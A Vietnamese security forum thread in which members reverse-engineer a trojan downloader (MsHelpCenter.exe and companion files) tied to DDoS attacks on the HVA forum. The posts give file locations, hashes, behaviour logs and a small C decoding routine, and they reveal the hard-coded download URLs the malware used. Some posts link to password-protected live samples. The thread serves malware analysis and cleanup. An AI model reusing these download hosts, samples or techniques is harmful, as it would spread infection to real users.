2 Nobitapm: file jucheck.exe đó của em là file sạch, chính hãng Sun, bảo hành đàng hoàng. Máy em install Win7 64bit à ?

Cảm ơn anh TQN. Win7 64bit đúng rồi đó anh :D. Do e không rành về IT nên không biết kiểm tra file sạch hay virus. :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

Tiếc quá, mình xoá hết rồi, mới ăn cơm xong. Hồi sáng có chạy chương trình cports và smsniff nhưng không chụp hình của nó. :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

asaxin wrote:

Tiếc quá, mình xoá hết rồi, mới ăn cơm xong. Hồi sáng có chạy chương trình cports và smsniff nhưng không chụp hình của nó. :(

Bạn cứ gửi boot log với Process Monitor đi :) . Hướng dẫn scan và gửi boot log với Process Monitor http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/ Gửi log Autoruns nữa: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 asaxin: Bạn chỉ mới xoá AcrobatUpdater.exe và mấy file .msi linh tinh trong thư mục %Temp%. Nhưng thằng downloader giấu mặt vẫn chắc chắn tồn tại 100% trên máy của bạn. Yên tâm, cứ từ từ nghiền ngẫm và tìm ra thằng giấu mặt này. Mấy anh STL đang đọc topic này cũng đang tự hỏi trong máy bạn, thằng giấu mặt, nằm vùng là thằng nào ? Làm sao cho nó biến mất đây ? Ai biểu code "mèo què" cho cố vô rồi giờ không biết máy nào nhiểm A, máy nào nhiểm B... Em hướng dẫn nhé: chỉ cần modify source một chút thôi, cho thằng nằm vùng gởi về, ê, tao là Ver xxx nè, file name xxx nè, mấy anh build em vào ngày x, giờ Y nè. Rồi theo file config mà thằng nằm vùng down về, mấy anh ra lệnh: à mày, ver x, name Y phải không, mày làm theo lệnh tao như vầy vầy nè ! Mấy anh không làm kiểu đó thì bây giờ chính mấy anh cũng rối, phải không mấy anh em STL ? Cùng là người VN cả mà, thương nhau, đùm bọc nhau, chứ ai muốn dồn mấy anh vào đường cùng đâu !? Quay đầu là bờ mà, phải không mấy anh "Theo Lệnh Sống Chết", ăn lương ngoại bang, "rước voi về dày mã tổ", củng là "mồ mả ông bà nội mấy anh". Chứ không lý có thằng tàu khựa nào biết và đọc về nhật ký chống DDOS của anh conmale ???!!! Bạn asaxin cứ bình tĩnh, từ từ mà làm: manh mối con giấu mặt, nằm vùng thì bây giờ chỉ có trên mấy bạn thôi ! Bạn yên tâm, nó vẫn tồn tại và sống nhăn răn 100%. Và nó cũng không thể tự xoá được. STL chưa viết một dòng code nào cho .exe tự xoá cả. Toàn nhờ thằng .exe khác xoá nó. Bạn tìm ra được con giấu mặt đấy thì giúp biết bao nhiêu cho mọi anh em đang đọc topic này, giúp cho mọi người đang tìm, vạch mặt đám bán nước, theo ngoại bang này. Nếu bạn tìm được đích thị thằng nằm vùng đó, em sẽ chỉ cần bỏ ra 3h RCE là lòi ra master website mới của mấy thằng STL này (mẹ nó, mình tôn sùng STL: Standard Template Library của C++, do bao guru C++ viết ra, mà giờ viết tắt phải chịu viết cái tên thối tha, dơ bẩn của tụi "Sống chết theo lệnh" này).

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

hi bolzano_1989, Mình để file Process Monitor và autorun trong link dưới: http://www.mediafire.com/?0n270j9v6jknqje password: malware @TQN: vậy để từ từ em nghiền ngẫm, vì máy em dính trojan là laptop chạy Windows, còn máy duyệt web chạy linux. Ai muốn xoá mấy file trong laptop máy em cũng khó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

asaxin nén và upload các file sau cho mình và anh TQN: c:\windows\microsoft help\mshelpcenter.exe Bạn gửi file cho mình qua địa chỉ email sau:

CMC InfoSec sẽ cập nhật mầm virus này sớm nhất có thể. Anh chị em kiểm tra nếu trong máy tính nào có file ở đường dẫn trên, vui lòng gửi cho mình và anh TQN gấp, xin cảm ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Hóng mẫu, có mẫu mới thì em post tiếp, nếu không thì em đi ngủ :) A ha, lại là MsHelpCenter.exe =)) =)) Nếu thế bạn lấy luôn các file sau cùng 1 lượt cho tiện, đỡ up nhiều MsHelpCenter.idx thumbcache.db _desktop.ini cùng thư mục cả đấy, tổng cộng tầm 10MB, code thì ít mà toàn sh!t bên trong

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Theo 2 file Autoruns và ProcMon của Asaxin, mình thấy máy đang dính virus của STL của Asaxin cũng đang dùng WinXP SP3 (hay Win7) phải không ? Nhờ Asaxin up các file sau trên máy của bạn: 1. C:\Windows\system32\Dwm.exe: file này XP SPxxx không bao giờ có ! 2. C:\Windows\Fonts\StaticCache.dat: Lại là StaticCaches à, sao đặt trong Windows\Fonts 3. C:\Windows\System32\dllhost.exe: chưa biết, để em sigcheck và symchk. 4. C:\Program Files\quicktime\qttask.exe: Không chắc lắm, có thể file của QuickTime 5. c:\program files\internet download manager\idman.exe: bạn đang dùng bản crack của IDM phải không ? 6. C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll 7. C:\Program Files\Google\GoogleToolbarNotifier\5.6.5805.1910\swg.dll 8. GoogleUpdate.exe: Mọi file luôn, cho dù nằm ở đâu ! 9. wmpnscfg.exe: Mọi file, cho dù nằm ở đâu ! 10. C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe 11. c:\program files\common files\installshield\driver\1150\intel 32\idrivert.exe 12. c:\windows\microsoft help\mshelpcenter.exe 13. c:\program files\common files\sony shared\avlib\sptisrv.exe File nào không có thì thôi, chịu khó chút nhé bạn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

Mình đã gửi mẫu này cho bolzano_1989 và TQN trong tin nhắn riêng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đã nhận được file của asaxin. Đúng rồi,còn thiếu thumbcache.db và _desktop.ini nữa, asaxin bật chế độ view hidden file lên, tìm và up giùm 2 file đó. Đích thị nằm vùng của STL rồi, không biết là mới hay cũ so với mẫu của acxxx89 ? Chia sẽ với bà con luôn: http://www.mediafire.com/?0jomzjk727n7181. Password: malware

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

acoustics89 wrote:

Hóng mẫu, có mẫu mới thì em post tiếp, nếu không thì em đi ngủ :) A ha, lại là MsHelpCenter.exe =)) =)) Nếu thế bạn lấy luôn các file sau cùng 1 lượt cho tiện, đỡ up nhiều MsHelpCenter.idx thumbcache.db _desktop.ini cùng thư mục cả đấy, tổng cộng tầm 10MB, code thì ít mà toàn sh!t bên trong

Còn thiếu! asaxin gửi thêm các file sau cho mình nhé: C:\MsHelpCenter.pdb c:\windows\microsoft help\thumbcache.db c:\windows\microsoft help\_desktop.ini c:\windows\microsoft help\MsHelpCenter.idx

TQN wrote:

Đã nhận được file của asaxin. Đúng rồi,còn thiếu thumbcache.db và _desktop.ini nữa, asaxin bật chế độ view hidden file lên, tìm và up giùm 2 file đó. Đích thị nằm vùng của STL rồi, không biết là mới hay cũ so với mẫu của acxxx89 ? Chia sẽ với bà con luôn: http://www.mediafire.com/?0jomzjk727n7181. Password: malware

Em thấy còn thiếu MsHelpCenter.pdb .

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

Trong thư mục c:\windows\microsoft help của mình chỉ có 2 file là .exe và idx đã gửi thôi, không còn file nào khác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

asaxin wrote:

Trong thư mục c:\windows\microsoft help của mình chỉ có 2 file là .exe và idx đã gửi thôi, không còn file nào khác.

Bạn chịu khó dùng GMER hay Winrar, tìm đến thư mục c:\windows\microsoft help\ rồi copy file. Hiện cần 2 file sau để decrypt: c:\windows\microsoft help\thumbcache.db c:\windows\microsoft help\_desktop.ini

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Thằng ông nội coder của stl (viết thường mày luôn cho bỏ ghét) khi build mshelpcenter.idx lại để debuginfo sót lại trong .exe file: G:\LiveUpdate\DummyLauncher\Release\DummyLauncher.pdb Ái chà chà, hai file mshelpcenter.exe và mshelpcenter.idx "hơi bị xưa" rồi: 1.mshelpcenter.exe: build date: 27/12/2010, 10:21:59. 2. mshelpcenter.idx: 21/11/2010, 01:43:19 - thức khuya dữ vậy ha - tội nghiệp coder STL, cày như trâu bò ! Thằng code con gì đó ngày 30/04 còn không được đi chơi với em út, gia đình nữa !?

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

Dấu kỹ quá, dùng winrar mới thấy ra. c:\windows\microsoft help\thumbcache.db c:\windows\microsoft help\_desktop.ini http://www.mediafire.com/?8fxq7un19ardwfe password: malware

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, đủ file rồi đó acoustics89. Em RCE tiếp và tìm ra thằng website nào ra lệnh down AcrobeUpdater.exe về nhé. Giờ anh phải đi lang thang nữa rồi. 2 asaxin: Good job, tiếp tục chịu khó up các file mà tui đã list ở trên để kiểm tra luôn nhé ! Thank you very nhiều !

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

TQN wrote:

Hì hì, đủ file rồi đó acoustics89. Em RCE tiếp và tìm ra thằng website nào ra lệnh down AcrobeUpdater.exe về nhé. Giờ anh phải đi lang thang nữa rồi. 2 asaxin: Good job, tiếp tục chịu khó up các file mà tui đã list ở trên để kiểm tra luôn nhé ! Thank you very nhiều !

Đây là mẫu mà em tìm được trong máy: http://www.mediafire.com/?agsg6yco2amvle0 password: malware

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Thank bộ mẫu của bạn asaxin. Đây là mẫu mới chưa gặp bao giờ, tuy cũng hơi giống với mẫu cũ mình có, mình vừa reverse xong, chia sẻ với các bạn Trước tiên là về Tác dụng của các file C:\MsHelpCenter.pdb >>> chịu, mình không có file này c:\windows\microsoft help\thumbcache.db >>> Thư viện hỗ trợ download thôi c:\windows\microsoft help\_desktop.ini >> thư viện chứa hàm sinh xâu ngẫu nhiên, hàm giải mã DecodeStr, nói chung là Utility Library c:\windows\microsoft help\MsHelpCenter.idx >> chưa xong, post sau MsHelpCenter.exe >> CHịu trách nhiệm tải cái adobe lởm về để chạy. G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default. cái link để download là http://poxxf.com/flash.swf?cpn= name> Lại vào đọc code tiếp , thấy nó giải mã file này bằng 1 thuật toán decode khác, em cũng chả hiểu lắm, nó làm gì thì mình làm thế Code:

#include 
#include 
#include 

int main(int argc, char *argv[])
{
	FILE *f; int i;
	long lSize;
	char *pBuffer, *p;
	char v24,v23; 
	int v7 = 0;
	
	
	char szOutPut[MAX_PATH] = "";

	if ((argc <2) || (argc >3 ))
	{
		printf("Usage: Decode  ");
		exit(1);

	}
	if (argc == 2)
	{
		strcpy(szOutPut, "Decoded.txt");
	}
	else strncpy(szOutPut, argv[2],MAX_PATH);

	f = fopen(argv[1], "rb"); //doc file da ma hoa

	if (f)
	{
		fseek(f, 0, SEEK_END);
		lSize = ftell(f);
		fseek(f, 0, SEEK_SET);

		pBuffer =(char*) malloc(lSize+1024);
		if(pBuffer)
		{
			
			p = (char *)pBuffer+ 4;
			memset(pBuffer, 0, lSize+1024);
			fread((char*)pBuffer, lSize, 1, f);

			for ( i = 8; i < lSize; ++i )
			{
				v24 = p[v7 % 4];
				v23 = pBuffer[i];
				v23 = (v24 ^ v23) % 256;
				pBuffer[i] = v23;
				v7++;
				//v8 += v23 * v7++ % 7;
			}
		}
		fclose(f);


		if (pBuffer)
		{
			f = fopen(szOutPut, "wb");
			if (f)
			{
				fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
				fclose(f);
			}
			else printf("Can not open output file.");
			delete[] pBuffer ;
		}
	}
	else printf("Can not open input file.");
	return 0;
}

giải mã xong thì được xâu : http://poxxf.com/images.gif, lại tải về với User Agent là Gozilla_2/Default thấy nhiều kí tự 0x19 ở đầu file quá nhỉ, dung lượng lại lớn ( 282624 bytes) , cho vào Hex workshop XOR phát, may thì được luôn mà không thì đọc code tiếp :P Xor xong thì nó ra cái AdobeUpdate giả. Có lẽ đến đây, anh em đã biết thủ phạm tải cái adobe giả về

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không biết nói lời nào nữa, quá trời good job luôn acoustics89 ! Em làm nhanh thiệt, anh thì cứ đi từng file, từng hàm của nó. Nên chậm hơn em nhiều. Vậy là bà con đã biết thằng nằm vùng giấu mặt down AcrobatUpdater.exe về rồi nhé. Thủ phạm đây: MsHelpCenter.exe. Bà con tuyên truyền mọi người quen biết, cộng đồng mạng nên nhanh tay xoá MsHelpCenter.* và cái thumbcache.db, _desktop.ini. Cảm ơn acoustics89, asaxin, bolzano (theo thứ tự ABC nhé, không phân bì nhé) rất nhiều. Nhờ các bạn, một đám "mèo què" của stl nằm vùng đã bị bà con vạch mặt. Và cũng nhờ mọi người, bà con cùng nhau tiếp tục úp các mẫu này cho các AV để các AV cập nhật và thịt cổ đám "mèo què" này: MS, KIS/KAV, Avira, AVG, Symantec, Trend... Thịt xong đám mshelpcenter này và AcrobatUpdater.exe này, chắc chắn STL sẽ không còn nhiều "hàng" để chơi trò bẩn thỉu DDOS nữa. Các bà con khác tiếp tục dùng Wireshark, CurPorts, SmartSniffs để tìm và up mẫu lên cho mọi người. Cũng có thể còn một (hay vài thằng nằm vùng nào đó nữa :-( )

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

acoustics89 wrote:

nobitapm wrote:
PXMMRF wrote:

2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance.
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w
Mẫu này không phải virus, bạn yên tâm nhé

Hì hì. Nó là thành phần của virus W32/VulcaBot của STL đấy. Tham khảo kỹ lai McAfee blog tại: http://blogs.mcafee.com/corporate/cto/vietnamese-speakers-targeted-in-cyberattack Đây là trường hợp "a Trojan horse masquerading as jucheck.exe" (Trojan hay virus đeo mặt nạ giả danh jucheck.exe). Vì jucheck.exe nguyên mẫu trong java là file chính thức của application này dùng để kiểm tra và nhắc nhở user update cho Java. Tác giả các virus thường dùng tên của một service hay tên file chính thức của OS, application để làm người dùng bối rối và tránh bị detect trong một số trường hợp. Trong trường hợp này ta phải kiểm tra kỹ với cách sau: 1- Kiểm tra xem file có digitally signed bởi Sun Microsystems, Inc không? Đây là yêu cầu quan trong và chính xác nhất 2 -Kiểm tra vị trí của file trong các directory xem có đúng không? jucheck.exe chính thức, nguyên bản phải nằm ở directory sau: C:\Program Files\Java\jre1.6.0_01\bin\jucheck.exe. Trong đó phần jre1.6.0_01 là tuỳ theo version của Java. Nếu jucheck.exe. nằm ở location dưới đây như McAfee đã viết ở blog trên: C:\Program Files\Java\jre6\bin\jucheck.exe thì jucheck.exe có thể vẫn là virus nếu máy bạn không đang cài Version mới nhất của Java. Trong trường hợp cài version mới nhất của Java thì Jucheck.exe có dung lượng là 422 KB (trên nên Win7) Nhưng nếu jucheck.exe lại nằm hay còn nằm ở các location sau: C:\Windows\System32\ C:\Program Files\Common Files\ hay C:\Users\AppData\Local\Temp\ và đặc biệt là C:\Windows\jucheck.exe Thì rất nhiều khả năng jucheck.exe là virus của STL Tôi chưa kiểm tra file jucheck.exe mà bạn nobitapm upload lên mediafire là file thật hay giả (vì bận kiểm việc khác) Xin bạn kiểm tra lại kỹ hơn Thưc tế cũng không đơn giản như ta nghĩ, nhất là với STL. C' est la vie mà

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Không biết nói lời nào nữa, quá trời good job luôn acoustics89 ! Em làm nhanh thiệt, anh thì cứ đi từng file, từng hàm của nó. Nên chậm hơn em nhiều. Vậy là bà con đã biết thằng nằm vùng giấu mặt down AcrobatUpdater.exe về rồi nhé. Thủ phạm đây: MsHelpCenter.exe. Bà con tuyên truyền mọi người quen biết, cộng đồng mạng nên nhanh tay xoá MsHelpCenter.* và cái thumbcache.db, _desktop.ini. Cảm ơn acoustics89, asaxin, bolzano (theo thứ tự ABC nhé, không phân bì nhé) rất nhiều. Nhờ các bạn, một đám "mèo què" của stl nằm vùng đã bị bà con vạch mặt. Và cũng nhờ mọi người, bà con cùng nhau tiếp tục úp các mẫu này cho các AV để các AV cập nhật và thịt cổ đám "mèo què" này: MS, KIS/KAV, Avira, AVG, Symantec, Trend... Thịt xong đám mshelpcenter này và AcrobatUpdater.exe này, chắc chắn STL sẽ không còn nhiều "hàng" để chơi trò bẩn thỉu DDOS nữa. Các bà con khác tiếp tục dùng Wireshark, CurPorts, SmartSniffs để tìm và up mẫu lên cho mọi người. Cũng có thể còn một (hay vài thằng nằm vùng nào đó nữa :-( )

Hì hì, công nhận acoustics89 nhanh khiếp :). Anh nghĩ cái đống "mèo què" chưa hết đâu em. Theo anh thăm dò thì shells, hosts, domains.... còn nhiều lắm. Kỳ này phối hợp để "xin" vài cái địa chỉ thiệt thì hoạ may tình hình mới khác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

nhưng mấy anh ơi, bài toán lại bắt đầu lại rồi : MsHelpCenter.exe Câu hỏi: ai tải cái MsHelpCenter.exe và các file kia về ?? :| Trả lời nốt câu này mới ổn ??

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Kệ nó em, acoustics89. Tới đây là được rồi, vì MsHelpCenter.exe đã cũ rồi, từ tháng 12 năm ngoái, lại được hardcoded string poxxf.com. Nó nằm nằm vùng lâu rồi. Giờ cắt được nó là coi như cắt 1 tay của tụi stl rồi. Chiều giờ ngồi nhà theo dõi topic này luôn. Ngoài trời đang mưa nữa, có lý do ngồi nhà hợp lý ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

thegunner2401 — GMT

E lại thấy ba file jucheck.exe nằm trong các thư mục: C:\Program Files\Adobe\Adobe Dreamweaver CS5\JVM\bin C:\ProgramData\Adobe\CS5\jre\bin C:\Program Files\Common Files\Java\Java Update Vậy liệu có những file nào bất thường ko các A? Nếu có thì E sẽ up lên để các A RE.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Kệ nó em, acoustics89. Tới đây là được rồi, vì MsHelpCenter.exe đã cũ rồi, từ tháng 12 năm ngoái, lại được hardcoded string poxxf.com. Nó nằm nằm vùng lâu rồi. Giờ cắt được nó là coi như cắt 1 tay của tụi stl rồi. Chiều giờ ngồi nhà theo dõi topic này luôn. Ngoài trời đang mưa nữa, có lý do ngồi nhà hợp lý ;)

Hì hì, trời này làm vài ve ở SG với anh em chắc có lý lắm đây. Sydney lạnh bỏ bu. Tối nay xuống còn có 3 độ. Còn cái msHelpCenter.exe thì anh nghĩ có thể nó đi ra từ những con trojan nhỏ hơn tự động "call home" và download những binaries lớn hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đơn giản nhất cho mọi người tự kiểm tra là: open jucheck.exe = Notepad ;), search string MSVBVM60.DLL. Nếu có, nó chính là virus, còn không thì cho chắc ăn, up lên VirusTotal để check.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Đây là tiến trình chạy của em MsHelpCenter.exe Code:

Set File Attributes: %SystemRoot%\Microsoft Help\thumbcache.db Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\thumbcache.db
Create File: %SystemRoot%\Microsoft Help\thumbcache.db
Set File Attributes: %SystemRoot%\Microsoft Help\thumbcache.db Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: %SystemRoot%\Microsoft Help\_desktop.ini Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\_desktop.ini
Create File: %SystemRoot%\Microsoft Help\_desktop.ini
Set File Attributes: %SystemRoot%\Microsoft Help\_desktop.ini Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.idx Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.idx
Create File: %SystemRoot%\Microsoft Help\MsHelpCenter.idx
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.old Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.old
Move File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe to %SystemRoot%\Microsoft Help\MsHelpCenter.old
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe
Create File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe
Set File Attributes: C:\MsHelpCenter.pdb Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\MsHelpCenter.pdb
Create File: C:\MsHelpCenter.pdb
Set File Attributes: C:\MsHelpCenter.pdb Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Delete File: C:\80423577.rar
Move File: C:\80423577.exe to C:\80423577.rar
Set File Attributes: C:\80423577.rar Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Copy File: C:\MsHelpCenter.pdb to C:\80423577.exe
Open File: %SystemRoot%\AppPatch\sysmain.sdb
Open File: %SystemRoot%\AppPatch\systest.sdb
Open File: \Device\NamedPipe\ShimViewer
Open File: C:\
Find File: C:\80423577.exe

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Ngoài ra còn thay rồi trong reg Code:

HKEY_CURRENT_USER\Software\Microsoft\Windows\Microsoft Help Center\DatabaseIndex = [REG_DWORD, value: 00000002]
HKEY_CURRENT_USER\Software\Microsoft\Windows\Microsoft Help Center\ContentHash = 470065006E006500720061006C00

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

acoustics89 wrote:

nhưng mấy anh ơi, bài toán lại bắt đầu lại rồi : MsHelpCenter.exe Câu hỏi: ai tải cái và các file kia về ?? :| Trả lời nốt câu này mới ổn ??

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK? --------- Tôi cho rằng có lẽ một trojạn nhất định phải nằm trong file MsHelpCenter.idx ấy. [8.8 MB- Modified: (chắc bởi STL) Friday, December 31, 2010, 9:34:38 AM] Có lẽ trojạn embedded trong file này (trojạn thuôc loại Downloader-Dropper trojạn gì đó) mới được dùng để download Adobeupdater.exe về chứ. Kiểm tra sơ bộ thì dường như vậy. Nhưng để kiểm tra kỹ hơn, vì đang bận check cái webserver (master website) mà asaxin cung cấp. Đây chắc là master website chứa Adobeupdater.exe nhúng trong một image file .jpg Các file khác -desktop.ini, thumb.... thì theo tôi không cần quan tâm

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

PXMMRF wrote:

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK?

Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned :) : http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Đúng rồi có một Trojạn nằm trong file MsHelpCenter.idx , như tôi nói ở trên Đây là một trojạn khá mới, vì các virus DAT file của F-secure chỉ mới update vào cuối tháng 5 năm 2011. Trình Avira AntiVir cài trong máy của tôi không phát hiện được trojan này khi download nó từ Mediafire về, dù Avira để ở chế độ Guard:active. Tuy nhiên scan thẳng vào file thì phát hiện ra. Còn trình McAfee (enterprise) cũng cài trên máy tôi thì không phát hiện ra gì, dù scan thẳng vào file Avira gọi nó là TR/Dropper.Gen4, còn F-secure gọi là Backdoor.Generic.649884, AVG gọi là Dropper.Generic3.BNIS, Avas goi Win32:Malware-gen... vân vân. Riêng SpyRemove thì gọi với tên dài BackDoor.Generic 12.APEB ,mô tả nó như một trojan-backdoor nguy hiểm chay trong hệ thống cho phép hacker thâm nhập từ xa vào các máy bị nhiễm trojan trên mạng. BackDoor.Generic 12.APEB sử dụng một chương trình cho phép download về máy nhiễm trojan các file nguy hiểm từ trên mạng. Trojan này cũng có một keylogger thu thập các thông tin cá nhân từ máy nạn nhân (bị nhiễm Trojan) gửi đến các webserver của hacker... Vậy trojan này chính là công cụ download Adobeupdater.exe và các file tương tự khác từ Master websites về máy nạn nhân (chứ không phải là MsHelpCenter.exe ). Các bạn kiểm tra kỹ sẽ thấy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

bolzano_1989 wrote:

PXMMRF wrote:

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK?
Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned :) : http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090

Nó đây nè bolzano_1989 ạ Chú ý trong folder có tên là MsHelpCenter mà bạn asaxin upload lên Mediafire có 2 file: MsHelpcenter.exe và MsHelpCenter.idx. File MsHelpCenter.idx mới có Trojan còn file kia MsHelpCenter.exe (.exe file-fice chạy) thì lai là 1 file nguyên thuỷ của MS. Bản phân tích của MsHelpCenter.exe đây nè:

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

http://file.virscan.org/report/bf383219ec51b164e9b9c307426803a6.html Không biết ai đã submit lên, nhưng trên VIRSCAN đã có mẫu này từ 21/07. Đúng những virus mà anh PXMMRF đã chỉ ra.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

